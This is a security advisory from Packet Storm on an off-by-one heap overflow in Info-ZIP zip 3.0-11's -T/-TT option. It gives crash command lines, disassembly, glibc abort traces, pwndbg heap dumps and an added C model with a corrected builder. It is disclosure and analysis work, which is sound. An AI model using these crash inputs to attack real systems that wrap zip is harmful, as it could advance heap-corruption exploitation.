Info-Zip Zip 3.0-11 Crash

Published 05 Jul 2018. Reported by Sehun Oh. Type: packetstorm. Source: packetstormsecurity.com

Info-ZIP Zip 3.0-11 Crash due to Off-by-One Vulnerability on Ubuntu 16.04.3 LTS

Code
`Hello,  
  
I found a crash in Info-ZIP's zip command.  
This vulnerability is caused by an off-by-one.  
I don't use a malformed file for the crash, just the command line.  
  
And if the 'zip' binary is wrapped by some other function, it can be an exploitable vulnerability, I think.  
  
[ Environment ]  
  
OS : Ubuntu 16.04.3 LTS  
Kernel : Linux ubuntu 4.4.0-127-generic #153-Ubuntu SMP Sat May 19 10:58:46 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux  
info-zip zip : 3.0-11  
  
[ Condition ]  
  
* using option -T, -TT  
* Vulnerability is occured by off by one.  
: linux command execution using option -T, -TT  
: To execute the command used in the -T and -TT options, it is stored in the heap before the system, and the data to be stored is parsed as follows.  
: 0x18 => zip flagT.zip -T -TT 'AAAAAAAAAAAA' => AAAAAAAAAAAA 'flagT.zip'  
: 0x38 => zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' => AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 'flagT.zip'  
: 0x58 => zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 'flagT.zip'  
: When an instruction is stored in the heap, it is occured by off by one.  
: It happens in the code below.  
Disassembly -  
.text:000000000040A052 mov rax, [rsp+48h+var_40]  
.text:000000000040A057 mov word ptr [r15+rax+2], 27h  
Hexray -  
*(_WORD *)&v7[v16 + 2] = 0x27;  
  
  
[ Error Msg ]  
  
CMD : zip flagT.zip -T -TT 'AAAAAAAAAAAA' <- process dies  
sh: 1: AAAAAAAAAAAA: not found  
*** Error in `zip': free(): invalid next size (fast): 0x00000000009ef350 ***  
======= Backtrace: =========  
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7f47300237e5]  
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a]  
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c]  
zip[0x409f25]  
zip[0x4079ef]  
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f472ffcc830]  
zip[0x408529]  
======= Memory map: ========  
00400000-0042c000 r-xp 00000000 08:01 2229966 /usr/bin/zip  
0062c000-0062d000 r--p 0002c000 08:01 2229966 /usr/bin/zip  
0062d000-0062f000 rw-p 0002d000 08:01 2229966 /usr/bin/zip  
0062f000-0067e000 rw-p 00000000 00:00 0  
009ee000-00a0f000 rw-p 00000000 00:00 0 [heap]  
7f4728000000-7f4728021000 rw-p 00000000 00:00 0  
7f4728021000-7f472c000000 ---p 00000000 00:00 0  
7f472fabe000-7f472fad4000 r-xp 00000000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1  
7f472fad4000-7f472fcd3000 ---p 00016000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1  
7f472fcd3000-7f472fcd4000 rw-p 00015000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1  
7f472fcd4000-7f472ffac000 r--p 00000000 08:01 2229713 /usr/lib/locale/locale-archive  
7f472ffac000-7f473016c000 r-xp 00000000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so  
7f473016c000-7f473036c000 ---p 001c0000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so  
7f473036c000-7f4730370000 r--p 001c0000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so  
7f4730370000-7f4730372000 rw-p 001c4000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so  
7f4730372000-7f4730376000 rw-p 00000000 00:00 0  
7f4730376000-7f4730385000 r-xp 00000000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4  
7f4730385000-7f4730584000 ---p 0000f000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4  
7f4730584000-7f4730585000 r--p 0000e000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4  
7f4730585000-7f4730586000 rw-p 0000f000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4  
7f4730586000-7f47305ac000 r-xp 00000000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so  
7f4730786000-7f473078a000 rw-p 00000000 00:00 0  
7f47307aa000-7f47307ab000 rw-p 00000000 00:00 0  
7f47307ab000-7f47307ac000 r--p 00025000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so  
7f47307ac000-7f47307ad000 rw-p 00026000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so  
7f47307ad000-7f47307ae000 rw-p 00000000 00:00 0  
7ffc94323000-7ffc94344000 rw-p 00000000 00:00 0 [stack]  
7ffc9439b000-7ffc9439e000 r--p 00000000 00:00 0 [vvar]  
7ffc9439e000-7ffc943a0000 r-xp 00000000 00:00 0 [vdso]  
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]  
  
  
zip error: Interrupted (aborting)  
*** Error in `zip': free(): invalid pointer: 0x00000000009ef370 ***  
======= Backtrace: =========  
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7f47300237e5]  
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a]  
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c]  
zip[0x40873e]  
zip[0x4090cb]  
zip[0x409279]  
/lib/x86_64-linux-gnu/libc.so.6(+0x354b0)[0x7f472ffe14b0]  
/lib/x86_64-linux-gnu/libc.so.6(gsignal+0x38)[0x7f472ffe1428]  
/lib/x86_64-linux-gnu/libc.so.6(abort+0x16a)[0x7f472ffe302a]  
/lib/x86_64-linux-gnu/libc.so.6(+0x777ea)[0x7f47300237ea]  
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a]  
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c]  
zip[0x409f25]  
zip[0x4079ef]  
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f472ffcc830]  
zip[0x408529]  
======= Memory map: ========  
00400000-0042c000 r-xp 00000000 08:01 2229966 /usr/bin/zip  
0062c000-0062d000 r--p 0002c000 08:01 2229966 /usr/bin/zip  
0062d000-0062f000 rw-p 0002d000 08:01 2229966 /usr/bin/zip  
0062f000-0067e000 rw-p 00000000 00:00 0  
009ee000-00a0f000 rw-p 00000000 00:00 0 [heap]  
7f4728000000-7f4728021000 rw-p 00000000 00:00 0  
7f4728021000-7f472c000000 ---p 00000000 00:00 0  
7f472fabe000-7f472fad4000 r-xp 00000000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1  
7f472fad4000-7f472fcd3000 ---p 00016000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1  
7f472fcd3000-7f472fcd4000 rw-p 00015000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1  
7f472fcd4000-7f472ffac000 r--p 00000000 08:01 2229713 /usr/lib/locale/locale-archive  
7f472ffac000-7f473016c000 r-xp 00000000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so  
7f473016c000-7f473036c000 ---p 001c0000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so  
7f473036c000-7f4730370000 r--p 001c0000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so  
7f4730370000-7f4730372000 rw-p 001c4000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so  
7f4730372000-7f4730376000 rw-p 00000000 00:00 0  
7f4730376000-7f4730385000 r-xp 00000000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4  
7f4730385000-7f4730584000 ---p 0000f000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4  
7f4730584000-7f4730585000 r--p 0000e000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4  
7f4730585000-7f4730586000 rw-p 0000f000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4  
7f4730586000-7f47305ac000 r-xp 00000000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so  
7f4730786000-7f473078a000 rw-p 00000000 00:00 0  
7f47307a9000-7f47307aa000 rw-p 00000000 00:00 0  
7f47307ab000-7f47307ac000 r--p 00025000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so  
7f47307ac000-7f47307ad000 rw-p 00026000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so  
7f47307ad000-7f47307ae000 rw-p 00000000 00:00 0  
7ffc94323000-7ffc94344000 rw-p 00000000 00:00 0 [stack]  
7ffc9439b000-7ffc9439e000 r--p 00000000 00:00 0 [vvar]  
7ffc9439e000-7ffc943a0000 r-xp 00000000 00:00 0 [vdso]  
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]  
  
  
CMD : zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' <- marked by the reporter as not dying; glibc's malloc check still aborts it, as shown below  
  
sh: 1: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: not found  
*** Error in `zip': corrupted size vs. prev_size: 0x0000000001702190 ***  
======= Backtrace: =========  
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fa2c7f497e5]  
/lib/x86_64-linux-gnu/libc.so.6(+0x7e913)[0x7fa2c7f50913]  
/lib/x86_64-linux-gnu/libc.so.6(+0x81cde)[0x7fa2c7f53cde]  
/lib/x86_64-linux-gnu/libc.so.6(__libc_malloc+0x54)[0x7fa2c7f56184]  
/lib/x86_64-linux-gnu/libc.so.6(_IO_file_doallocate+0x55)[0x7fa2c7f3f1d5]  
/lib/x86_64-linux-gnu/libc.so.6(_IO_doallocbuf+0x34)[0x7fa2c7f4d594]  
/lib/x86_64-linux-gnu/libc.so.6(_IO_file_overflow+0x1c8)[0x7fa2c7f4c8f8]  
/lib/x86_64-linux-gnu/libc.so.6(_IO_file_xsputn+0xad)[0x7fa2c7f4b28d]  
/lib/x86_64-linux-gnu/libc.so.6(_IO_vfprintf+0xd1)[0x7fa2c7f1f241]  
/lib/x86_64-linux-gnu/libc.so.6(__fprintf_chk+0xf9)[0x7fa2c7fe8bc9]  
zip[0x40a0a4]  
zip[0x4079ef]  
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fa2c7ef2830]  
zip[0x408529]  
======= Memory map: ========  
00400000-0042c000 r-xp 00000000 08:01 2229966 /usr/bin/zip  
0062c000-0062d000 r--p 0002c000 08:01 2229966 /usr/bin/zip  
0062d000-0062f000 rw-p 0002d000 08:01 2229966 /usr/bin/zip  
0062f000-0067e000 rw-p 00000000 00:00 0  
01701000-01722000 rw-p 00000000 00:00 0 [heap]  
7fa2c0000000-7fa2c0021000 rw-p 00000000 00:00 0  
7fa2c0021000-7fa2c4000000 ---p 00000000 00:00 0  
7fa2c79e4000-7fa2c79fa000 r-xp 00000000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1  
7fa2c79fa000-7fa2c7bf9000 ---p 00016000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1  
7fa2c7bf9000-7fa2c7bfa000 rw-p 00015000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1  
7fa2c7bfa000-7fa2c7ed2000 r--p 00000000 08:01 2229713 /usr/lib/locale/locale-archive  
7fa2c7ed2000-7fa2c8092000 r-xp 00000000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so  
7fa2c8092000-7fa2c8292000 ---p 001c0000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so  
7fa2c8292000-7fa2c8296000 r--p 001c0000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so  
7fa2c8296000-7fa2c8298000 rw-p 001c4000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so  
7fa2c8298000-7fa2c829c000 rw-p 00000000 00:00 0  
7fa2c829c000-7fa2c82ab000 r-xp 00000000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4  
7fa2c82ab000-7fa2c84aa000 ---p 0000f000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4  
7fa2c84aa000-7fa2c84ab000 r--p 0000e000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4  
7fa2c84ab000-7fa2c84ac000 rw-p 0000f000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4  
7fa2c84ac000-7fa2c84d2000 r-xp 00000000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so  
7fa2c86ac000-7fa2c86b0000 rw-p 00000000 00:00 0  
7fa2c86d0000-7fa2c86d1000 rw-p 00000000 00:00 0  
7fa2c86d1000-7fa2c86d2000 r--p 00025000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so  
7fa2c86d2000-7fa2c86d3000 rw-p 00026000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so  
7fa2c86d3000-7fa2c86d4000 rw-p 00000000 00:00 0  
7ffc0dc06000-7ffc0dc27000 rw-p 00000000 00:00 0 [stack]  
7ffc0dd37000-7ffc0dd3a000 r--p 00000000 00:00 0 [vvar]  
7ffc0dd3a000-7ffc0dd3c000 r-xp 00000000 00:00 0 [vdso]  
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]  
  
  
zip error: Interrupted (aborting)  
  
  
[ Debugging ] (gdb with pwndbg)  
set follow-fork-mode parent   <- stay attached to zip, not to the shell that system() forks  
b*0x0000000000409F13  
b*0x0000000000409E11  
r flagT.zip -T -TT 'AAAAAAAAAAAA'  
  
* Case 1 : zip flagT.zip -T -TT 'AAAAAAAAAAAA'  
: In this case the command buffer is malloc(0x18): a 0x20 chunk with 24 usable bytes, exactly the length of "AAAAAAAAAAAA 'flagT.zip'".  
: So the terminating NUL is written one byte past the buffer, onto the low byte of the next chunk's size field (off by one).  
# Not Crash (one 'A' fewer: the 23-byte string and its NUL fit in the 24 usable bytes)  
pwndbg> x/32gx 0x67f340  
0x67f340: 0x0000000000000230 0x0000000000000020 <- chunk header, size 0x20: user data is the 24 bytes at 0x67f350  
0x67f350: 0x4141414141414141 0x616c662720414141 <- "AAAAAAAA" "AAA 'fla"  
0x67f360: 0x002770697a2e5467 0x00000000000000c1 <- "gT.zip'\0" ends inside the chunk; next chunk's size 0xc1 intact  
0x67f370: 0x00000000000a031e 0x000000004ce40567  
0x67f380: 0x0000000040a61838 0x0000000000000003  
0x67f390: 0x0000000000000003 0x0000001800000004  
0x67f3a0: 0x0000000000000000 0x0000000000000001  
0x67f3b0: 0x0000000000000000 0x0000000081b40000  
0x67f3c0: 0x000000000067f490 0x0000000000000000  
0x67f3d0: 0x000000000067f450 0x0000000000000000  
0x67f3e0: 0x000000000067f430 0x000000000067f470  
0x67f3f0: 0x000000000067f4d0 0x0000000000000000  
0x67f400: 0x0000000000000000 0x0000000000000000  
0x67f410: 0x0000000000000000 0x0000000000000000  
0x67f420: 0x0000000000000000 0x0000000000000021  
0x67f430: 0x00007f0067616c66 0x00007ffff7bc1b78  
  
# Crash (12 'A's: the 24-byte string fills the chunk and its NUL spills over)  
0x67f340: 0x0000000000000230 0x0000000000000020  
0x67f350: 0x4141414141414141 0x6c66272041414141 <- "AAAAAAAA" "AAAA 'fl"  
0x67f360: 0x2770697a2e546761 0x0000000000000000 <- "agT.zip'" fills the last 8 bytes; the NUL lands on the next chunk's size field (off by one)  
0x67f370: 0x00000000000a031e 0x000000004ce40567  
0x67f380: 0x0000000040a61838 0x0000000000000003  
0x67f390: 0x0000000000000003 0x0000001800000004  
0x67f3a0: 0x0000000000000000 0x0000000000000001  
0x67f3b0: 0x0000000000000000 0x0000000081b40000  
0x67f3c0: 0x000000000067f490 0x0000000000000000  
0x67f3d0: 0x000000000067f450 0x0000000000000000  
0x67f3e0: 0x000000000067f430 0x000000000067f470  
0x67f3f0: 0x000000000067f4d0 0x0000000000000000  
0x67f400: 0x0000000000000000 0x0000000000000000  
0x67f410: 0x0000000000000000 0x0000000000000000  
0x67f420: 0x0000000000000000 0x0000000000000021  
0x67f430: 0x00007f0067616c66 0x00007ffff7bc1b78  
  
* Case 2 : zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'  
# crash  
: before __fprintf_chk@plt <0x402330>  
0x67f150: 0x0000000000000000 0x0000000000000041  
0x67f160: 0x000000000067f0b0 0x4141414141414141  
0x67f170: 0x4141414141414141 0x4141414141414141  
0x67f180: 0x4141414141414141 0x6c66272041414141  
0x67f190: 0x2770697a2e546761 0x0000000000000100 <- off by one: the low byte of the next chunk's size field (at 0x67f198) was cleared by the NUL; this is the header glibc complains about as "corrupted size vs. prev_size"  
  
# not crash  
: before __fprintf_chk@plt <0x402330>  
0x67f150: 0x0000000000000000 0x0000000000000041  
0x67f160: 0x000000000067f0b0 0x4141414141414141  
0x67f170: 0x4141414141414141 0x4141414141414141  
0x67f180: 0x4141414141414141 0x616c662720414141  
0x67f190: 0x002770697a2e5467 0x00000000000001f1  
  
: after __fprintf_chk@plt <0x402330>  
0x67f150: 0x0000000000000000 0x0000000000000251  
0x67f160: 0x00007ffff7bc1db8 0x00007ffff7bc1db8  
0x67f170: 0x4141414141414141 0x4141414141414141  
0x67f180: 0x4141414141414141 0x616c662720414141  
0x67f190: 0x002770697a2e5467 0x0000000000000211  
  
  
`
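The length arithmetic described under [ Condition ] and confirmed by the Case 1 heap dumps, as an added standalone model. This is my own code, not zip's source and not part of the reporter's post: the buggy size formula (everything except the terminating NUL) is inferred from the report's numbers (0x18 for twelve 'A's plus 'flagT.zip'), the chunk rounding assumes glibc's ptmalloc on x86_64, and the archive name is the report's constructed one. It goes slightly beyond the three sizes the report lists and shows that every request of the form 16k+8 bytes (0x18, 0x28, 0x38, ...) leaves no slack for the NUL, while a corrected builder sizes the buffer for the terminator and bounds the copy.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Bytes the -TT command line really needs, terminator included:
 *   <unzip_cmd> ' ' '\'' <archive> '\'' '\0'
 * (the quoting is what the report's "AAAA... 'flagT.zip'" output shows). */
size_t cmd_bytes_needed(const char *unzip_cmd, const char *archive)
{
    return strlen(unzip_cmd) + 1 + 1 + strlen(archive) + 1 + 1;
}

/* Allocation size that reproduces the report's numbers (0x18 for twelve 'A's
 * and "flagT.zip"): everything except the terminating NUL. This models the
 * bug as inferred from the report; it is not a quote of zip's source. */
size_t buggy_alloc_size(const char *unzip_cmd, const char *archive)
{
    return strlen(unzip_cmd) + 1 + 1 + strlen(archive) + 1;
}

/* Usable bytes glibc ptmalloc hands back for a request on x86_64:
 * request + 8 header bytes, rounded up to 16, minimum chunk 0x20.
 * Assumption: glibc's allocator; other mallocs round differently. */
size_t glibc_usable_size(size_t request)
{
    size_t chunk = (request + 8 + 15) & ~(size_t)15;
    if (chunk < 32)
        chunk = 32;
    return chunk - 8;
}

/* 1 if the NUL written by the buggy builder lands on the next chunk's
 * size field, 0 if the chunk's alignment slack happens to absorb it. */
int buggy_overflows(const char *unzip_cmd, const char *archive)
{
    size_t need = cmd_bytes_needed(unzip_cmd, archive);
    size_t have = glibc_usable_size(buggy_alloc_size(unzip_cmd, archive));
    return need > have;
}

/* Corrected builder: the allocation counts the terminator and the copy is
 * bounded by that length, so no input length can step past the buffer. */
char *build_test_cmd(const char *unzip_cmd, const char *archive)
{
    size_t len = cmd_bytes_needed(unzip_cmd, archive);
    char *cmd = malloc(len);
    if (cmd == NULL)
        return NULL;
    int n = snprintf(cmd, len, "%s '%s'", unzip_cmd, archive);
    if (n < 0 || (size_t)n >= len) {   /* truncation guard; cannot trigger with len above */
        free(cmd);
        return NULL;
    }
    return cmd;
}

/* Helper for constructed inputs: n copies of c, NUL-terminated. */
char *repeat_char(char c, size_t n)
{
    char *s = malloc(n + 1);
    if (s == NULL)
        return NULL;
    memset(s, c, n);
    s[n] = '\0';
    return s;
}

int main(void)
{
    /* Constructed inputs: the report's 11/12/44/76 'A's plus 28 'A's (0x28),
     * which the same arithmetic predicts will also overflow. */
    const size_t lengths[] = { 11, 12, 28, 44, 76 };
    for (size_t i = 0; i < sizeof lengths / sizeof lengths[0]; i++) {
        char *a = repeat_char('A', lengths[i]);
        if (a == NULL)
            return 1;
        size_t req = buggy_alloc_size(a, "flagT.zip");
        printf("%2zu x 'A': request 0x%zx, usable %zu, need %zu -> %s\n",
               lengths[i], req, glibc_usable_size(req),
               cmd_bytes_needed(a, "flagT.zip"),
               buggy_overflows(a, "flagT.zip") ? "NUL hits next chunk's size field"
                                                : "fits");
        free(a);
    }
    return 0;
}
```

Build with `cc -Wall -o tt_model tt_model.c` and run it; the rows for 12, 28, 44 and 76 'A's report the overflow, the row for 11 'A's fits, matching the reporter's 0x18/0x38/0x58 observations. The single quotes in the corrected builder are copied from the report's output, not an escaping fix: an archive name containing a `'` would still break the shell command, but here both strings come from the same command line, so that is not a privilege boundary.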
